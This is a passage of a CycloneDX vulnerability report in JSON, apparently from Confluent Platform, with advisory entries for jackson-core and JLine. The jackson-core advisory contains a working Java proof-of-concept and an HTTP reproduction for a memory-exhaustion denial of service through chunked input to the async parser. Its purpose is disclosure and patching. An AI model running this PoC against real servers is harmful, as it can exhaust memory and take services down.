          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "GHSA-r7wm-3cxj-wff9",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [],
      "description": "## Summary\n\nThe fix released in jackson-core `2.18.6` and `2.21.1` for [GHSA-72hv-8253-57qq](https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq) (Number Length Constraint Bypass in Async Parser, published 2026-02-28) is incomplete. The fix commit `b0c428e6` (#1555) wired `validateIntegerLength` into a new `_setIntLength` helper and called it at every place where the integer portion of a number is *decided* (terminator byte arrived, `.` / `e/E` seen, end-of-feed inside a fully-buffered value). It did not call it on the much more attacker-relevant path: \"ran out of input while still inside `MINOR_NUMBER_INTEGER_DIGITS`, return `NOT_AVAILABLE` to caller\".\n\nAs a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, can keep the parser inside `MINOR_NUMBER_INTEGER_DIGITS` indefinitely. `_textBuffer.expandCurrentSegment()` grows on every chunk, and `validateIntegerLength` is never invoked. The accumulator is only gated by `maxStringLength` (20 MiB default) \u2014 a **~20,000x amplification** of the documented `maxNumberLength` (1000 default).\n\nThis is the same vulnerability class, same advisory wording (\"Memory Exhaustion: Unbounded allocation in TextBuffer from excessively long numbers\"), same parser class \u2014 just the streaming path the original fix didn't cover. The fix to the *fraction* path is correct (see `_finishFloatFraction` at line 1834-1837 of `NonBlockingUtf8JsonParserBase.java` in 2.18.6, where `_setFractLength(fractLen)` IS called before the `NOT_AVAILABLE` return); the equivalent call is missing from every integer-digit path.\n\n## Affected versions\n\nVerified on the patched releases:\n- `com.fasterxml.jackson.core:jackson-core` **2.18.6**\n- `com.fasterxml.jackson.core:jackson-core` **2.21.1**\n\nStructurally identical code in `tools.jackson.core` 3.0.x / 3.1.x \u2014 same `NonBlockingUtf8JsonParserBase` class, same `_setIntLength` rollout, same NOT_AVAILABLE returns without validation. Not retested but presumed vulnerable.\n\n## Affected code\n\n[`src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java`](https://github.com/FasterXML/jackson-core/blob/b0c428e6/src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java) in 2.18.6 / 2.21.1.\n\n### Site 1 \u2014 `_startPositiveNumber(int ch)` lines 1320-1330:\n\n```java\nif (outPtr >= outBuf.length) {\n    // NOTE: must expand to ensure contents all in a single buffer (to keep\n    // other parts of parsing simpler)\n    outBuf = _textBuffer.expandCurrentSegment();\n}\noutBuf[outPtr++] = (char) ch;\nif (++_inputPtr >= _inputEnd) {\n    _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n    _textBuffer.setCurrentLength(outPtr);\n    return _updateTokenToNA();          // <-- no validateIntegerLength(outPtr)\n}\n```\n\n### Site 2 \u2014 `_finishNumberIntegralPart` lines 1691-1727:\n\n```java\nprotected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n    int negMod = _numberNegative ? -1 : 0;\n\n    while (true) {\n        if (_inputPtr >= _inputEnd) {\n            _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n            _textBuffer.setCurrentLength(outPtr);\n            return _updateTokenToNA();    // <-- no validateIntegerLength(outPtr + negMod)\n        }\n        int ch = getByteFromBuffer(_inputPtr) & 0xFF;\n        if (ch < INT_0) {\n            if (ch == INT_PERIOD) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        if (ch > INT_9) {\n            if ((ch | 0x20) == INT_e) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        ++_inputPtr;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n    }\n    _setIntLength(outPtr+negMod);            // <-- validated here\n    _textBuffer.setCurrentLength(outPtr);\n    return _valueComplete(JsonToken.VALUE_NUMBER_INT);\n}\n```\n\nThe pattern recurs at lines 1297, 1329, 1343, 1365, 1395, 1409, 1437, 1467, 1481, 1586, 1644, 1698 \u2014 every \"ran out of input mid-integer\" exit returns to the caller without validating the accumulator length.\n\n### Compare with the fraction path that is correct\n\n`_finishFloatFraction` lines 1827-1838:\n\n```java\nwhile (loop) {\n    if (ch >= INT_0 && ch <= INT_9) {\n        ++fractLen;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n        if (_inputPtr >= _inputEnd) {\n            _textBuffer.setCurrentLength(outPtr);\n            _setFractLength(fractLen);          // <-- VALIDATED\n            return JsonToken.NOT_AVAILABLE;\n        }\n        ch = getNextSignedByteFromBuffer();\n    }\n    ...\n}\n```\n\n## Impact\n\nReactive frameworks (Spring WebFlux / Reactor, Quarkus, Helidon, Vert.x JSON, anything wrapping `JsonFactory.createNonBlockingByteArrayParser()` or `createNonBlockingByteBufferParser()`) feed inbound HTTP/gRPC bytes to the async parser as they arrive. Operators who set `StreamReadConstraints.builder().maxNumberLength(N)` on the assumption that this caps memory per number value are not getting that guarantee in chunked-feed scenarios. The parser silently accumulates digits up to `maxStringLength` (20 MiB default) per concurrent connection. Multiply by attacker-controlled concurrency to OOM the JVM.\n\nThe synchronous parsers (`UTF8StreamJsonParser`, `ReaderBasedJsonParser`) and the async parser on *complete* input are not affected \u2014 those paths go through `_setIntLength` or `ParserBase._reportTooLongIntegral` correctly.\n\nCWE-770 (Allocation of Resources Without Limits or Throttling), CVSS roughly the same as the parent advisory (Network / Low complexity / High availability impact). The parent advisory was scored CVSS 8.7 High.\n\n## Proof of concept\n\nStandalone PoC, no Maven required:\n\n```\nmkdir poc && cd poc\ncurl -sLo jackson-core-2.18.6.jar https://repo1.maven.org/maven2/com/fasterxml/jackson/core/jackson-core/2.18.6/jackson-core-2.18.6.jar\ncat > PoC.java <<'EOF'\nimport com.fasterxml.jackson.core.*;\nimport com.fasterxml.jackson.core.async.ByteArrayFeeder;\n\npublic class PoC {\n    public static void main(String[] args) throws Exception {\n        StreamReadConstraints strict = StreamReadConstraints.builder()\n                .maxNumberLength(1000)\n                .build();\n        JsonFactory f = new JsonFactoryBuilder()\n                .streamReadConstraints(strict)\n                .build();\n\n        // Sanity: synchronous parser rejects 5000-digit int.\n        try (JsonParser p = f.createParser(\"{\\\"v\\\":\" + \"1\".repeat(5000) + \"}\")) {\n            while (p.nextToken() != null) { /* drive */ }\n            System.out.println(\"[-] BUG ABSENT: sync parser accepted\");\n            return;\n        } catch (Exception e) {\n            System.out.println(\"[+] sync parser rejected 5000-digit int: \" + e.getClass().getSimpleName());\n        }\n\n        // Bug: async parser, chunked, no terminator.\n        JsonParser ap = f.createNonBlockingByteArrayParser();\n        ByteArrayFeeder feeder = (ByteArrayFeeder) ap;\n\n        byte[] preamble = \"{\\\"v\\\":\".getBytes(\"UTF-8\");\n        feeder.feedInput(preamble, 0, preamble.length);\n        while (ap.nextToken() != JsonToken.NOT_AVAILABLE) { /* drain */ }\n\n        byte[] digits = new byte[16 * 1024];\n        for (int i = 0; i < digits.length; i++) digits[i] = (byte) ('1' + (i % 9));\n\n        for (int c = 0; c < 600; c++) {\n            feeder.feedInput(digits, 0, digits.length);\n            JsonToken t = ap.nextToken();\n            if (t != JsonToken.NOT_AVAILABLE) {\n                System.out.println(\"[-] unexpected token: \" + t);\n                return;\n            }\n        }\n        System.out.println(\"[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\");\n\n        // Closing the number now finally triggers the validator.\n        feeder.feedInput(\"}\".getBytes(\"UTF-8\"), 0, 1);\n        feeder.endOfInput();\n        try {\n            while (ap.nextToken() != null) { /* drive */ }\n        } catch (Exception e) {\n            System.out.println(\"[*] late rejection on close: \" + e.getMessage().split(\"\\n\")[0]);\n        }\n        ap.close();\n    }\n}\nEOF\njavac -cp jackson-core-2.18.6.jar PoC.java\njava -Xmx256m -cp jackson-core-2.18.6.jar:. PoC\n```\n\nObserved output against `jackson-core-2.18.6`:\n\n```\n[+] sync parser rejected 5000-digit int: StreamConstraintsException\n[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\n[*] late rejection on close: Number value length (9830400) exceeds the maximum allowed (1000, from `StreamReadConstraints.getMaxNumberLength()`)\n```\n\nObserved output against `jackson-core-2.21.1`: identical.\n\nThe 9.83 MB figure is purely a function of the loop bound (600 chunks * 16 KiB). The actual ceiling is `maxStringLength = 20 MiB`. With the strict policy declared as `maxNumberLength = 1000`, the parser permits **9830x** more allocation than the policy allows. With `maxStringLength` left at the default 20 MiB, an attacker can drive a single connection to 40 MiB of `char[]` heap (chars are 2 bytes each) before the validator finally fires on terminator/`endOfInput()`. Multiply by concurrent connections.\n\n## End-to-end reproduction through real HTTP\n\nSupplements the standalone PoC with a running Spring Boot WebFlux server,\ndriving the same bug through the actual reactor-netty + Jackson2JsonDecoder\nstreaming-decode path that production reactive endpoints use.\n\nSetup:\n- Spring Boot 3.3.5 starter-webflux (spring-webflux 6.1.14, reactor-netty 1.1.23)\n- jackson-databind 2.17.2, jackson-core overridden:\n  - VULN run: `com.fasterxml.jackson.core:jackson-core:2.18.7` (latest published)\n  - PATCHED run: `2.18.8-SNAPSHOT` built from the fix branch\n- JVM: OpenJDK 17.0.18\n- Server `JsonFactory` configured with `StreamReadConstraints.builder().maxNumberLength(1000).build()`\n\nEndpoint under test exposes the `Flux<DataBuffer>` request body directly to\n`Jackson2JsonDecoder.decode(Flux, ResolvableType, ...)` so the parser sees one\nHTTP chunk per `feedInput` (the same pattern used for any\n`@RequestBody Flux<...>` / streaming JSON decoder in WebFlux). A raw-socket\nHTTP/1.1 chunked client streams `{\"v\":1` then 250 chunks of 200 digit bytes\neach (50,000 digits total) at 20ms intervals, then writes the closing `}`.\n\nVULN \u2014 jackson-core 2.18.7:\n```\n[VULN-SMALLCHUNK] streamed 50000 digits across 250 chunks; server still accepting\n[VULN-SMALLCHUNK] full POST sent (50000 digits). Response:\nHTTP/1.1 200 OK\nERR after 6548ms cause=com.fasterxml.jackson.core.exc.StreamConstraintsException:\n       Number value length (50000) exceeds the maximum allowed (1000, ...)\n```\nServer-side controller trace (250 DataBuffer arrivals elided):\n```\n[ctrl] DataBuffer arrived size=6   ms=39       <- '{\"v\":1'\n[ctrl] DataBuffer arrived size=200 ms=42\n...\n[ctrl] DataBuffer arrived size=199 ms=5993\n[ctrl] DataBuffer arrived size=1   ms=6518     <- closing '}'\n[ctrl] ERR after 6548ms ... Number value length (50000) exceeds ...\n```\nServer held all 50,000 digit characters in `_textBuffer` for 6.5 seconds with\n`maxNumberLength=1000` declared. The validator never fires during streaming;\nit only fires at value-completion when the closing `}` arrives.\n\nPATCHED \u2014 jackson-core 2.18.8-SNAPSHOT (fix branch):\n```\n[PATCHED-SMALLCHUNK] connection broke after 2801 digits at chunk 14: [Errno 32] Broken pipe\n[PATCHED-SMALLCHUNK] DONE: digits_sent=2801 status=connection-broke-mid-stream\n```\nServer-side controller trace:\n```\n[ctrl] DataBuffer arrived size=6   ms=129\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=145\n[ctrl] DataBuffer arrived size=200 ms=146\n[ctrl] DataBuffer arrived size=200 ms=147\n[ctrl] ERR after 155ms ... Number value length (1001) exceeds the maximum allowed (1000, ...)\n```\nPatched server raises `StreamConstraintsException` at 155ms after only 5\nDataBuffers, exactly when the accumulated digit count crosses\n`maxNumberLength=1000`. The connection is reset mid-stream rather than the\nparser silently consuming the rest of the attacker's payload.\n\nSide-by-side:\n\n| Build | Chunks accepted before exception | Digits buffered | Time to detection |\n|---|---|---|---|\n| jackson-core 2.18.7 | 250 (full payload) | 50,000 (50x the configured limit) | 6,548ms \u2014 only at terminator |\n| 2.18.8-SNAPSHOT (fix branch) | 5 | 1,001 | 155ms \u2014 moment threshold crossed |\n\nNote on the default `@RequestBody Mono<JsonNode>` path: that path cannot\ndistinguish the two builds because Spring's `decodeToMono` joins all\nDataBuffers into one before parsing. The exploitable shape is the\nstreaming-decode path (`Flux<JsonNode>` / `@RequestBody Flux<...>` /\nWebSocket / SSE / any direct `decoder.decode(Flux<DataBuffer>, ...)` call),\nwhich is also what `Jackson2Tokenizer` uses for any streaming JSON\ndeserialization in WebFlux and Quarkus reactive REST.\n\n## Suggested fix\n\nMirror the pattern already used in `_finishFloatFraction`. At every site that returns `_updateTokenToNA()` (or `JsonToken.NOT_AVAILABLE`) with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`, call `_setIntLength(outPtr + negMod)` first. Concretely, the diff to `NonBlockingUtf8JsonParserBase.java` would be:\n\n```diff\n     protected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n         int negMod = _numberNegative ? -1 : 0;\n\n         while (true) {\n             if (_inputPtr >= _inputEnd) {\n                 _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n                 _textBuffer.setCurrentLength(outPtr);\n+                _streamReadConstraints.validateIntegerLength(outPtr + negMod);\n                 return _updateTokenToNA();\n             }\n```\n\nNote: `_setIntLength` itself can't be used as-is because it also assigns `_intLength`, and `_intLength` must not be set until the integer is truly complete (subsequent fraction handling reads `_intLength`). The minimal fix is to call only the validator, as shown.\n\nApply the same one-line insertion before each `return _updateTokenToNA();` that exits with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`. The sites are listed above (12 lines total).\n\nAlternatively, a heavier refactor: also gate `_textBuffer.expandCurrentSegment()` calls inside the digit-accumulation loops on `outPtr < maxNumberLength` so that the validator fires at the moment the buffer would be enlarged past the limit, rather than waiting for the next chunk boundary. Either approach is sufficient.\n\n## Credit\n\nReported by `tonghuaroot` (`tonghuaroot@gmail.com`). Variant hunt against the Feb 2026 fix for GHSA-72hv-8253-57qq.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-r7wm-3cxj-wff9"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/050b429804dce2a7e08f0be1b0b4c3d040fdb9cd"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/4cdd529749da396cc7edf6d4a2aad41d47902641"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/c5941e5aae7fd5aeac55d66933cfb82b9aabeef8"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/pull/1611"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-r7wm-3cxj-wff9"
        }
      ],
      "published": "2026-07-21T21:58:53+00:00",
      "updated": "2026-08-03T20:30:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#fc5d3a65-dce7-4623-800e-351b655eeaa4"
        },
        {
          "ref": "urn:cdx:9f11845d-5c4f-4d50-a9ad-2d75f4051d3f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#b1f3b751-1bba-4281-88d2-2d813262ad77"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#fbceda27-3b92-49a2-9c82-14384e7bfc32"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#a4e393a4-0146-444c-aa5d-c180fe4cbc5d"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#e14ed2c4-913b-48c6-b201-d99384868a98"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#dc490282-f7a0-4c99-bf4a-fe30bcaabb78"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#e4f48f4a-cda3-4dae-876e-5ac8bfd58271"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#ec407af3-cdcb-43d9-8bfc-bcce21329c03"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f9425e9f-3bf4-448e-99db-3d0a94dcfcdc"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#e3d0fedf-ce79-480e-904d-7bb58a4cce67"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#f6efa701-50f9-4a8c-b898-07cfaa5d8e70"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#feb3af5f-eb52-49ec-b4bd-629c66154f48"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f24ec544-4073-4d5e-bdcb-c3d52b61e1f1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#fb84087b-c3e6-402e-84dc-47cf9c4d23a7"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#c0e033f2-a4dd-418d-88e6-69099ece5df8"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c536c141-9595-4c9a-a9a1-945821828648"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#b8811a43-ec82-4f1f-9e91-a47ae85a8a27"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#e8126be3-42ed-478b-9f7c-9f77b15ae07b"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#fdd5c7ae-ad2d-4256-82dd-fe55ae2edfce"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#fc6f088e-f3bf-414f-b303-b4e1208cef3d"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. All CP REST APIs are built on blocking Jackson deserialization; the non-blocking async parser API this issue requires is never used anywhere in the CP repo set."
      }
    },
    {
      "id": "CVE-2026-56740",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not limit the number of environment variables a client may inject via the Telnet NEW-ENVIRON option, and TelnetIO.readNEVariables() in TelnetIO.java:1127-1180 stores each variable pair in a HashMap held by ConnectionData, allowing an unauthenticated attacker to flood unique variable pairs before the terminating IAC SE byte and exhaust JVM heap memory with an OutOfMemoryError. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56740"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/0389f0ee6d0375901b602671ad5dafd4d1d4ee09"
        },
        {
          "url": "https://github.com/jline/jline3/commit/4ee3a73849ffb9a85ec748e4e8cd8f6d81f84f40"
        },
        {
          "url": "https://github.com/jline/jline3/commit/934f09e6128cee33c2b13d42b6e859c1ee2d194b"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2001"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/jline-3.30.14"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-47qp-hqvx-6r3f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56740"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:23:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.1",
          "versions": [
            {
              "version": "3.25.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:eb74ed3e-1cd3-4ddb-9fe8-cfa4415d9665/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
